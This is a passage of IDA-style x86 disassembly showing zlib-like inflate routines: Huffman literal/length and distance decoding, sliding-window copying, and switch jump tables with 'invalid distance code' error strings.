loc_50C525: ; CODE XREF: sub_50BC4B+4B�j
; DATA XREF: _5:off_50C588�o
mov eax, [ebp+arg_0] ; jumptable 0050BC96 case 9
mov ecx, [ebp+var_8]
mov [ebx+20h], eax
mov eax, [ebp+var_4]
mov [ebx+1Ch], eax
mov eax, [ebp+arg_4]
mov [eax+4], ecx
mov ecx, [ebp+var_10]
mov edx, ecx
sub edx, [eax]
mov [eax], ecx
add [eax+8], edx
loc_50C546: ; CODE XREF: sub_50BC4B+687�j
; sub_50BC4B+7A2�j
mov ecx, [ebp+var_C]
push 0FFFFFFFDh
mov [ebx+34h], ecx
jmp short loc_50C579
; ---------------------------------------------------------------------------
loc_50C550: ; CODE XREF: sub_50BC4B+45�j
mov eax, [ebp+arg_0] ; default
mov ecx, [ebp+var_8]
mov [ebx+20h], eax
mov eax, [ebp+var_4]
mov [ebx+1Ch], eax
mov eax, [ebp+arg_4]
push 0FFFFFFFEh
mov [eax+4], ecx
mov ecx, [ebp+var_10]
mov edx, ecx
sub edx, [eax]
mov [eax], ecx
mov ecx, [ebp+var_C]
add [eax+8], edx
mov [ebx+34h], ecx
loc_50C579: ; CODE XREF: sub_50BC4B+74A�j
; sub_50BC4B+903�j
push eax
loc_50C57A: ; CODE XREF: sub_50BC4B+6B0�j
; sub_50BC4B+8D8�j
push ebx
call sub_50D8DE
add esp, 0Ch
loc_50C583: ; CODE XREF: sub_50BC4B+84E�j
pop edi
pop esi
pop ebx
leave
retn
sub_50BC4B endp
; ---------------------------------------------------------------------------
off_50C588 dd offset loc_50BC9D ; DATA XREF: sub_50BC4B+4B�r
dd offset loc_50BD7B ; jump table for switch statement
dd offset loc_50BDEE
dd offset loc_50BED8
dd offset loc_50BF70
dd offset loc_50C02E
dd offset loc_50C1FD
dd offset loc_50C4AF
dd offset loc_50C4F9
dd offset loc_50C525
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_50C5B0 proc near ; CODE XREF: sub_50CF00+21�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_4]
push edi
mov edi, [ebp+arg_0]
push 0
push esi
push edi
call sub_50BB53
push dword ptr [edi+28h]
push dword ptr [esi+28h]
call dword ptr [esi+24h]
push dword ptr [edi+24h]
push dword ptr [esi+28h]
call dword ptr [esi+24h]
push edi
push dword ptr [esi+28h]
call dword ptr [esi+24h]
add esp, 24h
xor eax, eax
pop edi
pop esi
pop ebp
retn
sub_50C5B0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_50C5E6 proc near ; CODE XREF: sub_50BC4B+E8�p
; sub_50BC4B+58C�p
arg_0 = byte ptr 8
arg_4 = byte ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
mov eax, [ebp+arg_10]
push 1Ch
push 1
push dword ptr [eax+28h]
call dword ptr [eax+20h]
add esp, 0Ch
test eax, eax
jz short loc_50C618
mov cl, [ebp+arg_0]
and dword ptr [eax], 0
mov [eax+10h], cl
mov cl, [ebp+arg_4]
mov [eax+11h], cl
mov ecx, [ebp+arg_8]
mov [eax+14h], ecx
mov ecx, [ebp+arg_C]
mov [eax+18h], ecx
loc_50C618: ; CODE XREF: sub_50C5E6+15�j
pop ebp
retn
sub_50C5E6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_50C61A proc near ; CODE XREF: sub_50BC4B+5DE�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 18h
push ebx
push esi
mov esi, [ebp+arg_4]
push edi
mov edi, [ebp+arg_0]
mov eax, [esi]
mov [ebp+var_4], eax
mov eax, [esi+4]
mov edx, [edi+34h]
mov [ebp+var_8], eax
mov eax, [edi+20h]
mov ebx, [edi+4]
mov [ebp+arg_4], eax
mov eax, [edi+1Ch]
mov [ebp+arg_0], eax
mov eax, [edi+30h]
cmp edx, eax
jnb short loc_50C652
sub eax, edx
dec eax
jmp short loc_50C657
; ---------------------------------------------------------------------------
loc_50C652: ; CODE XREF: sub_50C61A+31�j
mov eax, [edi+2Ch]
sub eax, edx
loc_50C657: ; CODE XREF: sub_50C61A+36�j
mov [ebp+var_C], eax
loc_50C65A: ; CODE XREF: sub_50C61A+E9�j
; sub_50C61A+16E�j ...
mov ecx, [ebx]
cmp ecx, 9 ; switch 10 cases
ja loc_50CB7E ; default
jmp ds:off_50CBB0[ecx*4] ; switch jump
loc_50C66C: ; DATA XREF: _5:off_50CBB0�o
cmp eax, 102h ; jumptable 0050C665 case 0
jb loc_50C708
cmp [ebp+var_8], 0Ah
jb loc_50C708
mov eax, [ebp+arg_4]
push esi
mov [edi+20h], eax
mov eax, [ebp+arg_0]
mov [edi+1Ch], eax
mov eax, [ebp+var_8]
mov [esi+4], eax
mov eax, [ebp+var_4]
mov ecx, eax
push edi
sub ecx, [esi]
mov [esi], eax
add [esi+8], ecx
mov [edi+34h], edx
push dword ptr [ebx+18h]
movzx eax, byte ptr [ebx+11h]
push dword ptr [ebx+14h]
push eax
movzx eax, byte ptr [ebx+10h]
push eax
call sub_50CBEB
mov [ebp+arg_8], eax
mov eax, [esi]
mov [ebp+var_4], eax
mov eax, [esi+4]
mov edx, [edi+34h]
mov [ebp+var_8], eax
mov eax, [edi+20h]
add esp, 18h
mov [ebp+arg_4], eax
mov eax, [edi+1Ch]
mov [ebp+arg_0], eax
mov eax, [edi+30h]
cmp edx, eax
jnb short loc_50C6E5
sub eax, edx
dec eax
jmp short loc_50C6EA
; ---------------------------------------------------------------------------
loc_50C6E5: ; CODE XREF: sub_50C61A+C4�j
mov eax, [edi+2Ch]
sub eax, edx
loc_50C6EA: ; CODE XREF: sub_50C61A+C9�j
cmp [ebp+arg_8], 0
mov [ebp+var_C], eax
jz short loc_50C708
mov ecx, [ebp+arg_8]
dec ecx
neg ecx
sbb ecx, ecx
and ecx, 2
add ecx, 7
mov [ebx], ecx
jmp loc_50C65A
; ---------------------------------------------------------------------------
loc_50C708: ; CODE XREF: sub_50C61A+57�j
; sub_50C61A+61�j ...
movzx eax, byte ptr [ebx+10h]
mov [ebx+0Ch], eax
mov eax, [ebx+14h]
mov [ebx+8], eax
mov dword ptr [ebx], 1
loc_50C71B: ; CODE XREF: sub_50C61A+4B�j
; sub_50C61A+12F�j
; DATA XREF: ...
mov eax, [ebx+0Ch] ; jumptable 0050C665 case 1
cmp [ebp+arg_0], eax
jnb short loc_50C74B
cmp [ebp+var_8], 0
jz loc_50CA88
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
and [ebp+arg_8], 0
dec [ebp+var_8]
movzx eax, byte ptr [eax]
shl eax, cl
or [ebp+arg_4], eax
inc [ebp+var_4]
add [ebp+arg_0], 8
jmp short loc_50C71B ; jumptable 0050C665 case 1
; ---------------------------------------------------------------------------
loc_50C74B: ; CODE XREF: sub_50C61A+107�j
mov eax, ds:dword_510318[eax*4]
mov ecx, [ebx+8]
and eax, [ebp+arg_4]
lea eax, [ecx+eax*8]
mov [ebp+var_14], eax
movzx ecx, byte ptr [eax+1]
movzx eax, byte ptr [eax+1]
sub [ebp+arg_0], eax
mov eax, [ebp+var_14]
shr [ebp+arg_4], cl
movzx ecx, byte ptr [eax]
test ecx, ecx
mov [ebp+var_18], ecx
jnz short loc_50C78D
mov eax, [eax+4]
mov dword ptr [ebx], 6
mov [ebx+8], eax
loc_50C785: ; CODE XREF: sub_50C61A+18D�j
; sub_50C61A+1A7�j ...
mov eax, [ebp+var_C]
jmp loc_50C65A
; ---------------------------------------------------------------------------
loc_50C78D: ; CODE XREF: sub_50C61A+15D�j
mov ecx, [ebp+var_18]
test cl, 10h
jz short loc_50C7A9
and ecx, 0Fh
mov [ebx+8], ecx
mov eax, [eax+4]
mov [ebx+4], eax
mov dword ptr [ebx], 2
jmp short loc_50C785
; ---------------------------------------------------------------------------
loc_50C7A9: ; CODE XREF: sub_50C61A+179�j
test cl, 40h
jz loc_50C89A
test cl, 20h
jz loc_50CA9A
mov dword ptr [ebx], 7
jmp short loc_50C785
; ---------------------------------------------------------------------------
loc_50C7C3: ; CODE XREF: sub_50C61A+4B�j
; sub_50C61A+1D7�j
; DATA XREF: ...
mov eax, [ebx+8] ; jumptable 0050C665 case 2
cmp [ebp+arg_0], eax
jnb short loc_50C7F3
cmp [ebp+var_8], 0
jz loc_50CA88
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
and [ebp+arg_8], 0
dec [ebp+var_8]
movzx eax, byte ptr [eax]
shl eax, cl
or [ebp+arg_4], eax
inc [ebp+var_4]
add [ebp+arg_0], 8
jmp short loc_50C7C3 ; jumptable 0050C665 case 2
; ---------------------------------------------------------------------------
loc_50C7F3: ; CODE XREF: sub_50C61A+1AF�j
mov eax, ds:dword_510318[eax*4]
mov ecx, [ebx+8]
and eax, [ebp+arg_4]
mov dword ptr [ebx], 3
shr [ebp+arg_4], cl
add [ebx+4], eax
mov eax, ecx
sub [ebp+arg_0], eax
movzx eax, byte ptr [ebx+11h]
mov [ebx+0Ch], eax
mov eax, [ebx+18h]
mov [ebx+8], eax
loc_50C81E: ; CODE XREF: sub_50C61A+4B�j
; sub_50C61A+232�j
; DATA XREF: ...
mov eax, [ebx+0Ch] ; jumptable 0050C665 case 3
cmp [ebp+arg_0], eax
jnb short loc_50C84E
cmp [ebp+var_8], 0
jz loc_50CA88
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
and [ebp+arg_8], 0
dec [ebp+var_8]
movzx eax, byte ptr [eax]
shl eax, cl
or [ebp+arg_4], eax
inc [ebp+var_4]
add [ebp+arg_0], 8
jmp short loc_50C81E ; jumptable 0050C665 case 3
; ---------------------------------------------------------------------------
loc_50C84E: ; CODE XREF: sub_50C61A+20A�j
mov eax, ds:dword_510318[eax*4]
mov ecx, [ebx+8]
and eax, [ebp+arg_4]
lea eax, [ecx+eax*8]
mov [ebp+var_14], eax
movzx ecx, byte ptr [eax+1]
movzx eax, byte ptr [eax+1]
sub [ebp+arg_0], eax
mov eax, [ebp+var_14]
shr [ebp+arg_4], cl
movzx ecx, byte ptr [eax]
test cl, 10h
jz short loc_50C891
and ecx, 0Fh
mov [ebx+8], ecx
mov eax, [eax+4]
mov [ebx+0Ch], eax
mov dword ptr [ebx], 4
jmp loc_50C785
; ---------------------------------------------------------------------------
loc_50C891: ; CODE XREF: sub_50C61A+25E�j
test cl, 40h
jnz loc_50CACF
loc_50C89A: ; CODE XREF: sub_50C61A+192�j
mov [ebx+0Ch], ecx
mov ecx, [eax+4]
lea eax, [eax+ecx*8]
mov [ebx+8], eax
jmp loc_50C785
; ---------------------------------------------------------------------------
loc_50C8AB: ; CODE XREF: sub_50C61A+4B�j
; sub_50C61A+2BF�j
; DATA XREF: ...
mov eax, [ebx+8] ; jumptable 0050C665 case 4
cmp [ebp+arg_0], eax
jnb short loc_50C8DB
cmp [ebp+var_8], 0
jz loc_50CA88
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
and [ebp+arg_8], 0
dec [ebp+var_8]
movzx eax, byte ptr [eax]
shl eax, cl
or [ebp+arg_4], eax
inc [ebp+var_4]
add [ebp+arg_0], 8
jmp short loc_50C8AB ; jumptable 0050C665 case 4
; ---------------------------------------------------------------------------
loc_50C8DB: ; CODE XREF: sub_50C61A+297�j
mov eax, ds:dword_510318[eax*4]
mov ecx, [ebx+8]
and eax, [ebp+arg_4]
mov dword ptr [ebx], 5
shr [ebp+arg_4], cl
add [ebx+0Ch], eax
mov eax, ecx
sub [ebp+arg_0], eax
loc_50C8F9: ; CODE XREF: sub_50C61A+4B�j
; DATA XREF: _5:off_50CBB0�o
mov ecx, [edi+28h] ; jumptable 0050C665 case 5
mov eax, edx
sub eax, [ebx+0Ch]
cmp eax, ecx
mov [ebp+var_10], eax
jnb short loc_50C91E
mov eax, [edi+2Ch]
sub eax, ecx
mov [ebp+var_18], eax
loc_50C910: ; CODE XREF: sub_50C61A+302�j
mov eax, [ebp+var_10]
add eax, [ebp+var_18]
cmp eax, [edi+28h]
mov [ebp+var_10], eax
jb short loc_50C910
loc_50C91E: ; CODE XREF: sub_50C61A+2EC�j
cmp dword ptr [ebx+4], 0
mov eax, [ebp+var_C]
jz loc_50C9E3
loc_50C92B: ; CODE XREF: sub_50C61A+3C3�j
test eax, eax
jnz loc_50C9B9
mov eax, [edi+2Ch]
cmp edx, eax
mov [ebp+var_14], eax
jnz short loc_50C95B
mov eax, [edi+30h]
mov ecx, [edi+28h]
cmp eax, ecx
jz short loc_50C95B
mov edx, ecx
cmp edx, eax
jnb short loc_50C952
sub eax, edx
dec eax
jmp short loc_50C957
; ---------------------------------------------------------------------------
loc_50C952: ; CODE XREF: sub_50C61A+331�j
mov eax, [ebp+var_14]
sub eax, edx
loc_50C957: ; CODE XREF: sub_50C61A+336�j
test eax, eax
jnz short loc_50C9B9
loc_50C95B: ; CODE XREF: sub_50C61A+321�j
; sub_50C61A+32B�j
push [ebp+arg_8]
mov [edi+34h], edx
push esi
push edi
call sub_50D8DE
mov edx, [edi+34h]
mov [ebp+arg_8], eax
mov eax, [edi+30h]
add esp, 0Ch
cmp edx, eax
mov [ebp+var_18], eax
jnb short loc_50C980
sub eax, edx
dec eax
jmp short loc_50C985
; ---------------------------------------------------------------------------
loc_50C980: ; CODE XREF: sub_50C61A+35F�j
mov eax, [edi+2Ch]
sub eax, edx
loc_50C985: ; CODE XREF: sub_50C61A+364�j
mov ecx, [edi+2Ch]
mov [ebp+var_C], eax
cmp edx, ecx
mov [ebp+var_14], ecx
jnz short loc_50C9B1
mov ecx, [edi+28h]
mov eax, [ebp+var_18]
cmp eax, ecx
jz short loc_50C9AE
mov edx, ecx
cmp edx, eax
jnb short loc_50C9A7
sub eax, edx
dec eax
jmp short loc_50C9B1
; ---------------------------------------------------------------------------
loc_50C9A7: ; CODE XREF: sub_50C61A+386�j
mov eax, [ebp+var_14]
sub eax, edx
jmp short loc_50C9B1
; ---------------------------------------------------------------------------
loc_50C9AE: ; CODE XREF: sub_50C61A+380�j
mov eax, [ebp+var_C]
loc_50C9B1: ; CODE XREF: sub_50C61A+376�j
; sub_50C61A+38B�j ...
test eax, eax
jz loc_50CADE
loc_50C9B9: ; CODE XREF: sub_50C61A+313�j
; sub_50C61A+33F�j
mov ecx, [ebp+var_10]
and [ebp+arg_8], 0
mov cl, [ecx]
mov [edx], cl
inc edx
inc [ebp+var_10]
dec eax
mov ecx, [ebp+var_10]
mov [ebp+var_C], eax
cmp ecx, [edi+2Ch]
jnz short loc_50C9DA
mov ecx, [edi+28h]
mov [ebp+var_10], ecx
loc_50C9DA: ; CODE XREF: sub_50C61A+3B8�j
dec dword ptr [ebx+4]
jnz loc_50C92B
loc_50C9E3: ; CODE XREF: sub_50C61A+30B�j
; sub_50C61A+469�j
and dword ptr [ebx], 0
jmp loc_50C65A
; ---------------------------------------------------------------------------
loc_50C9EB: ; CODE XREF: sub_50C61A+4B�j
; DATA XREF: _5:off_50CBB0�o
test eax, eax ; jumptable 0050C665 case 6
jnz loc_50CA75
mov eax, [edi+2Ch]
cmp edx, eax
mov [ebp+var_14], eax
jnz short loc_50CA1B
mov eax, [edi+30h]
mov ecx, [edi+28h]
cmp eax, ecx
jz short loc_50CA1B
mov edx, ecx
cmp edx, eax
jnb short loc_50CA12
sub eax, edx
dec eax
jmp short loc_50CA17
; ---------------------------------------------------------------------------
loc_50CA12: ; CODE XREF: sub_50C61A+3F1�j
mov eax, [ebp+var_14]
sub eax, edx
loc_50CA17: ; CODE XREF: sub_50C61A+3F6�j
test eax, eax
jnz short loc_50CA75
loc_50CA1B: ; CODE XREF: sub_50C61A+3E1�j
; sub_50C61A+3EB�j
push [ebp+arg_8]
mov [edi+34h], edx
push esi
push edi
call sub_50D8DE
mov edx, [edi+34h]
mov [ebp+arg_8], eax
mov eax, [edi+30h]
add esp, 0Ch
cmp edx, eax
mov [ebp+var_18], eax
jnb short loc_50CA40
sub eax, edx
dec eax
jmp short loc_50CA45
; ---------------------------------------------------------------------------
loc_50CA40: ; CODE XREF: sub_50C61A+41F�j
mov eax, [edi+2Ch]
sub eax, edx
loc_50CA45: ; CODE XREF: sub_50C61A+424�j
mov ecx, [edi+2Ch]
mov [ebp+var_C], eax
cmp edx, ecx
mov [ebp+var_14], ecx
jnz short loc_50CA71
mov ecx, [edi+28h]
mov eax, [ebp+var_18]
cmp eax, ecx
jz short loc_50CA6E
mov edx, ecx
cmp edx, eax
jnb short loc_50CA67
sub eax, edx
dec eax
jmp short loc_50CA71
; ---------------------------------------------------------------------------
loc_50CA67: ; CODE XREF: sub_50C61A+446�j
mov eax, [ebp+var_14]
sub eax, edx
jmp short loc_50CA71
; ---------------------------------------------------------------------------
loc_50CA6E: ; CODE XREF: sub_50C61A+440�j
mov eax, [ebp+var_C]
loc_50CA71: ; CODE XREF: sub_50C61A+436�j
; sub_50C61A+44B�j ...
test eax, eax
jz short loc_50CADE
loc_50CA75: ; CODE XREF: sub_50C61A+3D3�j
; sub_50C61A+3FF�j
mov cl, [ebx+8]
and [ebp+arg_8], 0
mov [edx], cl
inc edx
dec eax
mov [ebp+var_C], eax
jmp loc_50C9E3
; ---------------------------------------------------------------------------
loc_50CA88: ; CODE XREF: sub_50C61A+10D�j
; sub_50C61A+1B5�j ...
mov eax, [ebp+arg_4]
mov [edi+20h], eax
mov eax, [ebp+arg_0]
mov [edi+1Ch], eax
and dword ptr [esi+4], 0
jmp short loc_50CAF0
; ---------------------------------------------------------------------------
loc_50CA9A: ; CODE XREF: sub_50C61A+19B�j
mov dword ptr [ebx], 9
mov dword ptr [esi+18h], offset aInvalidLiteral ; "invalid literal/length code"
loc_50CAA7: ; CODE XREF: sub_50C61A+4B�j
; sub_50C61A+4C2�j
; DATA XREF: ...
mov eax, [ebp+arg_4] ; jumptable 0050C665 case 9
push 0FFFFFFFDh
mov [edi+20h], eax
mov eax, [ebp+arg_0]
mov [edi+1Ch], eax
mov eax, [ebp+var_8]
mov [esi+4], eax
mov eax, [ebp+var_4]
mov ecx, eax
sub ecx, [esi]
mov [esi], eax
add [esi+8], ecx
mov [edi+34h], edx
jmp loc_50CBA1
; ---------------------------------------------------------------------------
loc_50CACF: ; CODE XREF: sub_50C61A+27A�j
mov dword ptr [ebx], 9
mov dword ptr [esi+18h], offset aInvalidDistanc ; "invalid distance code"
jmp short loc_50CAA7 ; jumptable 0050C665 case 9
; ---------------------------------------------------------------------------
loc_50CADE: ; CODE XREF: sub_50C61A+399�j
; sub_50C61A+459�j
mov eax, [ebp+arg_4]
mov [edi+20h], eax
mov eax, [ebp+arg_0]
mov [edi+1Ch], eax
mov eax, [ebp+var_8]
mov [esi+4], eax
loc_50CAF0: ; CODE XREF: sub_50C61A+47E�j
mov eax, [ebp+var_4]
push [ebp+arg_8]
mov ecx, eax
sub ecx, [esi]
mov [esi], eax
add [esi+8], ecx
mov [edi+34h], edx
jmp loc_50CBA1
; ---------------------------------------------------------------------------
loc_50CB07: ; CODE XREF: sub_50C61A+4B�j
; DATA XREF: _5:off_50CBB0�o
cmp [ebp+arg_0], 7 ; jumptable 0050C665 case 7
jbe short loc_50CB17
sub [ebp+arg_0], 8
inc [ebp+var_8]
dec [ebp+var_4]
loc_50CB17: ; CODE XREF: sub_50C61A+4F1�j
push [ebp+arg_8]
mov [edi+34h], edx
push esi
push edi
call sub_50D8DE
mov edx, [edi+34h]
add esp, 0Ch
cmp [edi+30h], edx
jz short loc_50CB53
mov ecx, [ebp+arg_4]
push eax
mov [edi+20h], ecx
mov ecx, [ebp+arg_0]
mov [edi+1Ch], ecx
mov ecx, [ebp+var_8]
mov [esi+4], ecx
mov ecx, [ebp+var_4]
mov ebx, ecx
sub ebx, [esi]
mov [esi], ecx
add [esi+8], ebx
mov [edi+34h], edx
jmp short loc_50CBA1
; ---------------------------------------------------------------------------
loc_50CB53: ; CODE XREF: sub_50C61A+513�j
mov dword ptr [ebx], 8
loc_50CB59: ; CODE XREF: sub_50C61A+4B�j
; DATA XREF: _5:off_50CBB0�o
mov eax, [ebp+arg_4] ; jumptable 0050C665 case 8
push 1
mov [edi+20h], eax
mov eax, [ebp+arg_0]
mov [edi+1Ch], eax
mov eax, [ebp+var_8]
mov [esi+4], eax
mov eax, [ebp+var_4]
mov ecx, eax
sub ecx, [esi]
mov [esi], eax
add [esi+8], ecx
mov [edi+34h], edx
jmp short loc_50CBA1
; ---------------------------------------------------------------------------
loc_50CB7E: ; CODE XREF: sub_50C61A+45�j
mov eax, [ebp+arg_4] ; default
push 0FFFFFFFEh
mov [edi+20h], eax
mov eax, [ebp+arg_0]
mov [edi+1Ch], eax
mov eax, [ebp+var_8]
mov [esi+4], eax
mov eax, [ebp+var_4]
mov ecx, eax
sub ecx, [esi]
mov [esi], eax
add [esi+8], ecx
mov [edi+34h], edx
loc_50CBA1: ; CODE XREF: sub_50C61A+4B0�j
; sub_50C61A+4E8�j ...
push esi
push edi
call sub_50D8DE
add esp, 0Ch
pop edi
pop esi
pop ebx
leave
retn
sub_50C61A endp
; ---------------------------------------------------------------------------
off_50CBB0 dd offset loc_50C66C ; DATA XREF: sub_50C61A+4B�r
dd offset loc_50C71B ; jump table for switch statement
dd offset loc_50C7C3
dd offset loc_50C81E
dd offset loc_50C8AB
dd offset loc_50C8F9
dd offset loc_50C9EB
dd offset loc_50CB07
dd offset loc_50CB59
dd offset loc_50CAA7
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_50CBD8 proc near ; CODE XREF: sub_50BB53+3A�p
; sub_50BC4B+5F7�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push [ebp+arg_0]
mov eax, [ebp+arg_4]
push dword ptr [eax+28h]
call dword ptr [eax+24h]
pop ecx
pop ecx
pop ebp
retn
sub_50CBD8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_50CBEB proc near ; CODE XREF: sub_50C61A+9A�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 18h
push ebx
push esi
mov esi, [ebp+arg_10]
push edi
mov edi, [ebp+arg_14]
mov ecx, [esi+34h]
mov edx, [esi+1Ch]
mov eax, [edi]
mov [ebp+var_C], ecx
mov [ebp+var_8], eax
mov eax, [edi+4]
mov [ebp+var_4], eax
mov eax, [esi+20h]
mov [ebp+arg_14], eax
mov eax, [esi+30h]
cmp ecx, eax
jnb short loc_50CC20
sub eax, ecx
dec eax
jmp short loc_50CC25
; ---------------------------------------------------------------------------
loc_50CC20: ; CODE XREF: sub_50CBEB+2E�j
mov eax, [esi+2Ch]
sub eax, ecx
loc_50CC25: ; CODE XREF: sub_50CBEB+33�j
mov [ebp+var_10], eax
mov eax, [ebp+arg_0]
mov eax, ds:dword_510318[eax*4]
mov [ebp+var_14], eax
mov eax, [ebp+arg_4]
mov eax, ds:dword_510318[eax*4]
mov [ebp+arg_4], eax
loc_50CC42: ; CODE XREF: sub_50CBEB+72�j
; sub_50CBEB+231�j
cmp edx, 14h
jnb short loc_50CC5F
mov eax, [ebp+var_8]
dec [ebp+var_4]
mov ecx, edx
movzx eax, byte ptr [eax]
shl eax, cl
or [ebp+arg_14], eax
inc [ebp+var_8]
add edx, 8
jmp short loc_50CC42
; ---------------------------------------------------------------------------
loc_50CC5F: ; CODE XREF: sub_50CBEB+5A�j
mov eax, [ebp+var_14]
mov ecx, [ebp+arg_8]
and eax, [ebp+arg_14]
lea eax, [ecx+eax*8]
movzx ecx, byte ptr [eax]
mov [ebp+arg_0], ecx
test ecx, ecx
loc_50CC73: ; CODE XREF: sub_50CBEB+C4�j
movzx ecx, byte ptr [eax+1]
jz loc_50CDF6
shr [ebp+arg_14], cl
movzx ecx, byte ptr [eax+1]
sub edx, ecx
mov ecx, [ebp+arg_0]
test cl, 10h
jnz short loc_50CCB1
test cl, 40h
jnz loc_50CE56
mov ecx, ds:dword_510318[ecx*4]
and ecx, [ebp+arg_14]
add ecx, [eax+4]
lea eax, [eax+ecx*8]
movzx ecx, byte ptr [eax]
mov [ebp+arg_0], ecx
test ecx, ecx
jmp short loc_50CC73
; ---------------------------------------------------------------------------
loc_50CCB1: ; CODE XREF: sub_50CBEB+A1�j
and ecx, 0Fh
mov esi, ds:dword_510318[ecx*4]
and esi, [ebp+arg_14]
shr [ebp+arg_14], cl
add esi, [eax+4]
sub edx, ecx
mov [ebp+arg_0], esi
loc_50CCC9: ; CODE XREF: sub_50CBEB+F9�j
cmp edx, 0Fh
jnb short loc_50CCE6
mov eax, [ebp+var_8]
dec [ebp+var_4]
mov ecx, edx
movzx eax, byte ptr [eax]
shl eax, cl
or [ebp+arg_14], eax
inc [ebp+var_8]
add edx, 8
jmp short loc_50CCC9
; ---------------------------------------------------------------------------
loc_50CCE6: ; CODE XREF: sub_50CBEB+E1�j
mov eax, [ebp+arg_4]
mov ecx, [ebp+arg_C]
and eax, [ebp+arg_14]
movzx ebx, byte ptr [ecx+eax*8]
lea eax, [ecx+eax*8]
movzx ecx, byte ptr [eax+1]
shr [ebp+arg_14], cl
movzx ecx, byte ptr [eax+1]
sub edx, ecx
loc_50CD03: ; CODE XREF: sub_50CBEB+146�j
test bl, 10h
jnz short loc_50CD33
test bl, 40h
jnz loc_50CE21
mov ecx, ds:dword_510318[ebx*4]
and ecx, [ebp+arg_14]
add ecx, [eax+4]
movzx ebx, byte ptr [eax+ecx*8]
lea eax, [eax+ecx*8]
movzx ecx, byte ptr [eax+1]
shr [ebp+arg_14], cl
mov [ebp+var_18], ecx
sub edx, ecx
jmp short loc_50CD03
; ---------------------------------------------------------------------------
loc_50CD33: ; CODE XREF: sub_50CBEB+11B�j
and ebx, 0Fh
loc_50CD36: ; CODE XREF: sub_50CBEB+165�j
cmp edx, ebx
jnb short loc_50CD52
mov ecx, [ebp+var_8]
dec [ebp+var_4]
movzx esi, byte ptr [ecx]
mov ecx, edx
shl esi, cl
or [ebp+arg_14], esi
inc [ebp+var_8]
add edx, 8
jmp short loc_50CD36
; ---------------------------------------------------------------------------
loc_50CD52: ; CODE XREF: sub_50CBEB+14D�j
mov esi, ds:dword_510318[ebx*4]
mov ecx, ebx
and esi, [ebp+arg_14]
sub edx, ebx
shr [ebp+arg_14], cl
add esi, [eax+4]
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_C]
sub [ebp+var_10], eax
mov ebx, [ebp+arg_10]
mov eax, ecx
sub eax, esi
mov esi, [ebx+28h]
cmp eax, esi
jnb short loc_50CDD2
mov ebx, [ebx+2Ch]
mov [ebp+var_18], ebx
sub ebx, esi
loc_50CD85: ; CODE XREF: sub_50CBEB+19E�j
add eax, ebx
cmp eax, esi
jb short loc_50CD85
mov esi, [ebp+var_18]
sub esi, eax
cmp [ebp+arg_0], esi
jbe short loc_50CDB4
sub [ebp+arg_0], esi
loc_50CD98: ; CODE XREF: sub_50CBEB+1B4�j
mov bl, [eax]
mov [ecx], bl
inc ecx
inc eax
dec esi
jnz short loc_50CD98
mov eax, [ebp+arg_10]
mov esi, [eax+28h]
loc_50CDA7: ; CODE XREF: sub_50CBEB+1C5�j
mov al, [esi]
mov [ecx], al
inc ecx
inc esi
dec [ebp+arg_0]
jnz short loc_50CDA7
jmp short loc_50CDEE
; ---------------------------------------------------------------------------
loc_50CDB4: ; CODE XREF: sub_50CBEB+1A8�j
mov bl, [eax]
mov [ecx], bl
mov bl, [eax+1]
inc ecx
inc eax
mov [ecx], bl
inc ecx
inc eax
sub [ebp+arg_0], 2
loc_50CDC5: ; CODE XREF: sub_50CBEB+1E3�j
mov bl, [eax]
mov [ecx], bl
inc ecx
inc eax
dec [ebp+arg_0]
jnz short loc_50CDC5
jmp short loc_50CDEE
; ---------------------------------------------------------------------------
loc_50CDD2: ; CODE XREF: sub_50CBEB+190�j
mov bl, [eax]
mov [ecx], bl
mov bl, [eax+1]
inc ecx
inc eax
mov [ecx], bl
inc ecx
inc eax
sub [ebp+arg_0], 2
loc_50CDE3: ; CODE XREF: sub_50CBEB+201�j
mov bl, [eax]
mov [ecx], bl
inc ecx
inc eax
dec [ebp+arg_0]
jnz short loc_50CDE3
loc_50CDEE: ; CODE XREF: sub_50CBEB+1C7�j
; sub_50CBEB+1E5�j
mov esi, [ebp+arg_10]
mov [ebp+var_C], ecx
jmp short loc_50CE0D
; ---------------------------------------------------------------------------
loc_50CDF6: ; CODE XREF: sub_50CBEB+8C�j
shr [ebp+arg_14], cl
movzx ecx, byte ptr [eax+1]
mov al, [eax+4]
sub edx, ecx
mov ecx, [ebp+var_C]
inc [ebp+var_C]
dec [ebp+var_10]
mov [ecx], al
loc_50CE0D: ; CODE XREF: sub_50CBEB+209�j
cmp [ebp+var_10], 102h
jb short loc_50CE41
cmp [ebp+var_4], 0Ah
jb short loc_50CE41
jmp loc_50CC42
; ---------------------------------------------------------------------------
loc_50CE21: ; CODE XREF: sub_50CBEB+120�j
mov ecx, [edi+4]
mov eax, edx
sub ecx, [ebp+var_4]
mov dword ptr [edi+18h], offset aInvalidDistanc ; "invalid distance code"
shr eax, 3
cmp eax, ecx
jnb short loc_50CE39
mov ecx, eax
